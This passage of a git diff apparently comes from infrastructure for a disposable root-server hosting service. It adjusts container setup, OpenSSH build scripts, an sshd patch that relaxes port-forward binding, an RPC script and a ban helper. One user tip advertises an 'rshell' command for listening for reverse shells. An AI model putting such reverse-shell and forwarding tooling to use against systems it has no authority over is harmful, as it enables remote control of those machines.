-n $YOUR_GEOIP ]] && tofile "${YOUR_GEOIP}" "/config/self-for-guest/lg-${LID}/geoip" # Request a reverse Port Forward - [[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull docker exec --user 0:0 "lg-${LID}" curl -s sf/port + [[ -n $SF_RPORT_ON_LOGIN ]] && [[ -n $SF_RPORT ]] && [[ ! -f "/config/self-for-guest/lg-${LID}/reverse_ip" ]] && exec_devnull timeout 2 docker exec --user 0:0 "lg-${LID}" curl -s sf/port # Warn user if this is the last server by IP (after semaphore has been released) @@ -1400,7 +1390,7 @@ exec_devnull docker exec sf-master /ready-lg.sh "${LID}" "${C_IP}" "${LG_PID}" " # Setup container (within container's namespace) unset WGNAME_UP [[ -s "${SF_USER_DB_DIR}/wg/name_up" ]] && WGNAME_UP="$(<"${SF_USER_DB_DIR}/wg/name_up")" -exec_devnull docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..." +exec_devnull timeout 5 docker exec --user 0:0 --env SF_IS_NEW_SERVER="${SF_IS_NEW_SERVER}" --env WGNAME_UP="${WGNAME_UP}" "lg-${LID}" /sf/bin/sf-setup.sh || STOPEXIT "${LID}" 247 "Failed-#2 to set up guest container..." touch "/config/self-for-guest/lg-${LID}/THIS-DIRECTORY-IS-IN-MEMORY-ONLY" tofile "${C_IP:?}" "/config/self-for-guest/lg-${LID}/c_ip" diff --git a/host/mk_sshd.sh b/host/mk_sshd.sh index 047a7e1..77b4091 100755 --- a/host/mk_sshd.sh +++ b/host/mk_sshd.sh @@ -11,11 +11,17 @@ DSTDIR="/src/fs-root/usr/sbin" DSTBIN="${DSTDIR}/sshd" set -e -SRCDIR="/tmp/openssh-9.2p1" +SRCDIR="/src/dev/openssh-${VER:?}-sf" +[[ ! -d "/src/dev" ]] && mkdir -p "/src/dev" +cd /src/dev [[ ! -d "$SRCDIR" ]] && { # Cloudflare to often returns 503 - "BLOCKED" # wget -O- https://cloudflare.cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - - wget -O- https://artfiles.org/openbsd/OpenSSH/portable/openssh-9.2p1.tar.gz | tar xfz - + wget "https://artfiles.org/openbsd/OpenSSH/portable/openssh-${VER}.tar.gz" + tar xfz "openssh-${VER}.tar.gz" + mv "openssh-${VER}" "openssh-${VER}-orig" + tar xfz "openssh-${VER}.tar.gz" + mv "openssh-${VER}" "${SRCDIR}" cd "$SRCDIR" @@ -39,5 +45,5 @@ strip sshd [[ ! -d "${DSTDIR}" ]] && mkdir -p "${DSTDIR}" cp sshd "${DSTBIN}" chmod 755 "${DSTBIN}" -rm -rf "${SRCDIR:?}" +# rm -rf "${SRCDIR:?}" diff --git a/host/sf-sshd.patch b/host/sf-sshd.patch index 555ba37..e89566a 100644 --- a/host/sf-sshd.patch +++ b/host/sf-sshd.patch @@ -1,7 +1,7 @@ -diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-sf/channels.c ---- openssh-9.2p1-orig/channels.c 2023-02-02 12:21:54 -+++ openssh-9.2p1-sf/channels.c 2023-08-15 06:13:05 -@@ -3639,7 +3639,7 @@ +diff -x !*.[ch] -u openssh-9.6p1-orig/channels.c openssh-9.6p1-sf/channels.c +--- openssh-9.6p1-orig/channels.c 2023-12-18 14:59:50 ++++ openssh-9.6p1-sf/channels.c 2024-01-20 17:50:15 +@@ -3683,7 +3683,7 @@ ssh->chanctxt->IPv4or6 = af; } @@ -10,7 +10,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s /* * Determine whether or not a port forward listens to loopback, the * specified address or wildcard. On the client, a specified bind -@@ -3677,6 +3677,7 @@ +@@ -3721,6 +3721,7 @@ * address and it was overridden. */ if (*listen_addr != '\0' && @@ -18,10 +18,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/channels.c openssh-9.2p1-s strcmp(listen_addr, "0.0.0.0") != 0 && strcmp(listen_addr, "*") != 0) { ssh_packet_send_debug(ssh, -diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1-sf/serverloop.c ---- openssh-9.2p1-orig/serverloop.c 2023-02-02 12:21:54 -+++ openssh-9.2p1-sf/serverloop.c 2023-08-15 06:18:17 -@@ -102,6 +102,12 @@ +diff -x !*.[ch] -u openssh-9.6p1-orig/serverloop.c openssh-9.6p1-sf/serverloop.c +--- openssh-9.6p1-orig/serverloop.c 2023-12-18 14:59:50 ++++ openssh-9.6p1-sf/serverloop.c 2024-01-20 17:50:15 +@@ -101,6 +101,12 @@ /* requested tunnel forwarding interface(s), shared with session.c */ char *tun_fwd_ifnames = NULL; @@ -34,7 +34,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 /* returns 1 if bind to specified port by specified user is permitted */ static int bind_permitted(int port, uid_t uid) -@@ -391,8 +397,10 @@ +@@ -388,8 +394,10 @@ /* Clean up sessions, utmp, etc. */ cleanup_exit(255); } @@ -46,7 +46,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 if (conn_in_ready && process_input(ssh, connection_in) < 0) break; -@@ -637,12 +645,14 @@ +@@ -634,12 +642,14 @@ if (strcmp(ctype, "session") == 0) { c = server_request_session(ssh); @@ -67,7 +67,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 } if (c != NULL) { debug_f("confirm %s", ctype); -@@ -802,8 +812,20 @@ +@@ -799,8 +809,20 @@ ssh_packet_send_debug(ssh, "Server has disabled port forwarding."); } else { /* Start listening on the port */ @@ -90,10 +90,10 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/serverloop.c openssh-9.2p1 } if ((resp = sshbuf_new()) == NULL) fatal_f("sshbuf_new"); -diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/sshd.c ---- openssh-9.2p1-orig/sshd.c 2023-02-02 12:21:54 -+++ openssh-9.2p1-sf/sshd.c 2023-08-15 06:13:05 -@@ -536,8 +536,71 @@ +diff -x !*.[ch] -u openssh-9.6p1-orig/sshd.c openssh-9.6p1-sf/sshd.c +--- openssh-9.6p1-orig/sshd.c 2023-12-18 14:59:50 ++++ openssh-9.6p1-sf/sshd.c 2024-01-20 17:50:15 +@@ -531,8 +531,71 @@ return 0; } } @@ -165,7 +165,7 @@ diff --color=auto -x !*.[ch] -u -r openssh-9.2p1-orig/sshd.c openssh-9.2p1-sf/ss privsep_postauth(struct ssh *ssh, Authctxt *authctxt) { #ifdef DISABLE_FD_PASSING -@@ -576,8 +639,34 @@ +@@ -571,8 +634,34 @@ reseed_prngs(); diff --git a/master/cgi-bin/rpc b/master/cgi-bin/rpc index 211d1ca..2595611 100755 --- a/master/cgi-bin/rpc +++ b/master/cgi-bin/rpc @@ -47,6 +47,23 @@ Sanitize() [[ "${#REQUEST_URI}" -gt 512 ]] && BAIL "To long!" "ATTACK" ": REQUEST_URI(${#REQUEST_URI})=${REQUEST_URI:0:32}..." } +InitColors() { + # COLOR is set (to 'always') + Y=$CDY + C=$CDC + R=$CDR + RR=$CR + G=$CDG + B=$CB + M=$CDM + YY=$CY + W=$CW + N=$CN + F=$CF + ICON_ERROR="💥 " + ICON_WARN="💥 " +} + GetFormVars() { local IFS @@ -71,7 +88,6 @@ GetFormVars() [[ ${key} == "config" ]] && { R_CONFIG="${val//[^[:alnum:]-_+\/.]}" [[ ${R_CONFIG:0:1} == "-" ]] && unset R_CONFIG - [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}" } [[ ${key} == "pass"* ]] && R_PASS="${val//[^[:print:]]}" [[ ${key} == "user"* ]] && R_USER="${val//[^[:print:]]}" @@ -128,6 +144,9 @@ GetFormVars() [[ ! "${WG_DEV}" =~ ^wg ]] && WG_DEV="wg${WG_DEV}" } done + + [[ -n $COLOR ]] && InitColors + [[ -n "$R_CONFIG" ]] && [[ "${R_CONFIG:0:1}" != "/" ]] && BAIL "Path not absolute. Try ${C}curl ... -d config=\"\$(pwd)/${R_CONFIG}\"${N}" } # Load PID of WireGuard container @@ -685,9 +704,10 @@ BLPOP portd:response-${LID} 5" | redr) || return # The PortD add's a /sf/run/self/reverse_forward. echo -en "\ -${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} -${M}🤭 Tip${N}: Type ${C}rshell${N} -${G}👾 New reverse Port is ${Y}${ipport}${CN}" +${M}🌎 Tip${N}: Type ${C}cat /config/self/reverse_*${N} for details. +${M}🤭 Tip${N}: Type ${C}rshell${N} to start listening. +${M}🛜 Tip${N}: Type ${C}curl sf/port${N} to assign a new port. +${G}👾 Your reverse Port is ${Y}${ipport}${CN}" # portd.sh automaticaly adds this to /config/self/reverse_* exit @@ -807,22 +827,7 @@ cmd_wg_show() 0<&- # Close STDIN Sanitize GetFormVars -[[ -n $COLOR ]] && { - # COLOR is set (to 'always') - Y=$CDY - C=$CDC - R=$CDR - RR=$CR - G=$CDG - B=$CB - M=$CDM - YY=$CY - W=$CW - N=$CN - F=$CF - ICON_ERROR="💥 " - ICON_WARN="💥 " -} + [[ "${FCGI_CMD}" == "dmesg" ]] && { @@ -836,13 +841,13 @@ GetFormVars # If it is >=2025 then you can remove this block (it's now served via curl sf/vpn/*) [[ -n $SF_OVPN_HACK ]] && { wg_net_init - [[ ${ARGS[1]} == 'vpn' ]] && { - source "/sf/bin/funcs_vpn.sh" - [[ ${ARGS[2]} == 'up' ]] && cmd_vpn_up - [[ ${ARGS[2]} == 'show' ]] && cmd_vpn_show - [[ ${ARGS[2]} == 'del' ]] && cmd_vpn_del - [[ ${ARGS[2]} == 'down' ]] && cmd_vpn_del - cmd_vpn_help + [[ ${ARGS[1]} == 'ovpn' ]] && { + source "/sf/bin/funcs_ovpn.sh" + [[ ${ARGS[2]} == 'up' ]] && cmd_ovpn_up + [[ ${ARGS[2]} == 'show' ]] && cmd_ovpn_show + [[ ${ARGS[2]} == 'del' ]] && cmd_ovpn_del + [[ ${ARGS[2]} == 'down' ]] && cmd_ovpn_del + cmd_ovpn_help exit } } @@ -869,14 +874,14 @@ wg_net_init exit } -[[ "${FCGI_CMD}" == "vpn" ]] && { - source "/sf/bin/funcs_vpn.sh" - [[ ${ARGS[1]} == 'up' ]] && cmd_vpn_up - [[ ${ARGS[1]} == 'show' ]] && cmd_vpn_show - [[ ${ARGS[1]} == 'del' ]] && cmd_vpn_del - [[ ${ARGS[1]} == 'down' ]] && cmd_vpn_del +[[ "${FCGI_CMD}" == "ovpn" ]] && { + source "/sf/bin/funcs_ovpn.sh" + [[ ${ARGS[1]} == 'up' ]] && cmd_ovpn_up + [[ ${ARGS[1]} == 'show' ]] && cmd_ovpn_show + [[ ${ARGS[1]} == 'del' ]] && cmd_ovpn_del + [[ ${ARGS[1]} == 'down' ]] && cmd_ovpn_del # [[ ${ARGS[1]} == 'show' ]] && cmd_wg_show - cmd_vpn_help + cmd_ovpn_help exit } diff --git a/master/ready-lg.sh b/master/ready-lg.sh index ed5f19a..3f24cb0 100755 --- a/master/ready-lg.sh +++ b/master/ready-lg.sh @@ -19,7 +19,9 @@ USER_UL_RATE="$5" LID_PROMPT_FN="/dev/shm/sf/self-for-guest/lg-${LID}/prompt" # Create 'empty' for ZSH's prompt to show WG EXIT -[[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}" +# [[ ! -f "${LID_PROMPT_FN}" ]] && touch "${LID_PROMPT_FN}" +# Overwrite existing. Will be re-created by sf-setup.sh if WG-NET is up still. +:>"${LID_PROMPT_FN}" set -e LG_MAC=$(docker inspect -f '{{ (index .NetworkSettings.Networks "sf-guest").MacAddress }}' "lg-${LID:?}") diff --git a/provision/env.example b/provision/env.example index b33c7fa..0d2b112 100644 --- a/provision/env.example +++ b/provision/env.example @@ -37,7 +37,7 @@ SF_MULLVAD_IP=172.20.0.252 SF_MULLVAD_ROUTE=10.124.0.0/22 SF_NOVPN_IP=172.20.0.240 SF_NGINX_IP=172.20.1.80 -SF_RPC_IP=10.11.0.2 +SF_RPC_IP=100.126.224.2 SF_GSNC_IP=172.22.0.21 SF_SSHD_IP=172.22.0.22 SF_DOH_IP=172.23.0.2 @@ -49,9 +49,9 @@ SF_NET_ONION=10.111.0.0/16 SF_NET_VPN=172.20.0.0/24 SF_NET_VPN_DNS_IP=172.20.0.53 -SF_NET_LG=10.11.0.0/24 -SF_NET_LG_ROUTER_IP=10.11.0.1 -SF_NET_LG_ROUTER_IP_DUMMY=10.11.0.254 +SF_NET_LG=100.126.224.0/22 +SF_NET_LG_ROUTER_IP=100.126.224.1 +SF_NET_LG_ROUTER_IP_DUMMY=100.126.227.254 SF_NET_VPN_ROUTER_IP=172.20.0.2 diff --git a/sfbin/funcs.sh b/sfbin/funcs.sh index d67b8d7..74dcef6 100644 --- a/sfbin/funcs.sh +++ b/sfbin/funcs.sh @@ -5,7 +5,7 @@ CY="\e[1;33m" # yellow CG="\e[1;32m" # green CR="\e[1;31m" # red CC="\e[1;36m" # cyan -# CM="\e[1;35m" # magenta +CM="\e[1;35m" # magenta CW="\e[1;37m" # white CB="\e[1;34m" # blue CF="\e[2m" # faint diff --git a/sfbin/funcs_admin.sh b/sfbin/funcs_admin.sh index 6bc811d..49de824 100644 --- a/sfbin/funcs_admin.sh +++ b/sfbin/funcs_admin.sh @@ -14,6 +14,7 @@ _self_for_guest_dir="${_sf_shmdir}/self-for-guest" _sf_basedir="/sf" _sf_dbdir="${_sf_basedir}/config/db" unset _sf_isinit +_sf_region="$(hostname)" _sf_deinit() { @@ -507,27 +508,29 @@ lgrm() lgban() { local fn + local hn local ip local msg - local lid + local lglid="${1}" _sf_init - lid="${1}" shift 1 - fn="${_self_for_guest_dir}/${lid}/ip" + fn="${_self_for_guest_dir}/${lglid}/ip" [[ -f "$fn" ]] && { ip=$(<"$fn") + fn="${_self_for_guest_dir}/${lglid}/hostname" + [[ -f "${fn}" ]] && hn=$(<"${fn}") fn="${_sf_dbdir}/banned/ip-${ip:0:18}" [[ ! -e "$fn" ]] && { [[ $# -gt 0 ]] && msg="$*\n" - echo -en "$msg" >"${fn}" + echo -en "# ${CY}${hn:-NAME} ${CDY}${_sf_region:-REGION} ${lglid} ${ip:0:18}${CN}\n$msg" >"${fn}" } echo "Banned: $ip" } - lgstop "${lid}" "$@" - #_sf_lgrm "${lid}" # Dont lgrm here and give user chance to explain to re-instate his server. + lgstop "${lglid}" "$@" + #_sf_lgrm "${lglid}" # Dont lgrm here and give user chance to explain to re-instate his server. _sf_deinit } diff --git a/sfbin/funcs_vpn.sh b/sfbin/funcs_ovpn.sh similarity index 99% rename from sfbin/funcs_vpn.sh rename to sfbin/funcs_ovpn.sh index afcc226..d1bce3c 100644 --- a/sfbin/funcs_vpn.sh +++ b/sfbin/funcs_ovpn.sh @@ -6,7 +6,7 @@ [[ -z "$SF_GUEST_MTU" ]] && SF_GUEST_MTU=$((SF_HOST_MTU - 80)) -cmd_vpn_help() { +cmd_ovpn_help() { echo -en "\ Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\"${N} Use ${C}curl sf/vpn/up -d config=\"\$(pwd)/openvpn.conf\" -d user=username -d pass=password${N} @@ -241,7 +241,7 @@ vpn_stop() { nsenter.u1000 --setuid 0 --setgid 0 -t "${PID}" -n iptables -F FORWARD 2>/dev/null } -cmd_vpn_show() { +cmd_ovpn_show() { load_lg [[ -f "/tmp/lg-${LID:-?}/conf/conn.ovpn" ]] && { echo -e "${C}" @@ -252,12 +252,12 @@ cmd_vpn_show() { exit } -cmd_vpn_up() { +cmd_ovpn_up() { local str load_lg local link_mtu - [[ -z "$R_CONFIG" ]] && cmd_vpn_help + [[ -z "$R_CONFIG" ]] && cmd_ovpn_help WG_DEV="vpnEXIT" # echo "PID=$PID" @@ -379,7 +379,7 @@ Use ${C}curl sf/vpn/down${N} to disconnect. exit } -cmd_vpn_del() { +cmd_ovpn_del() { load_lg vpn_stop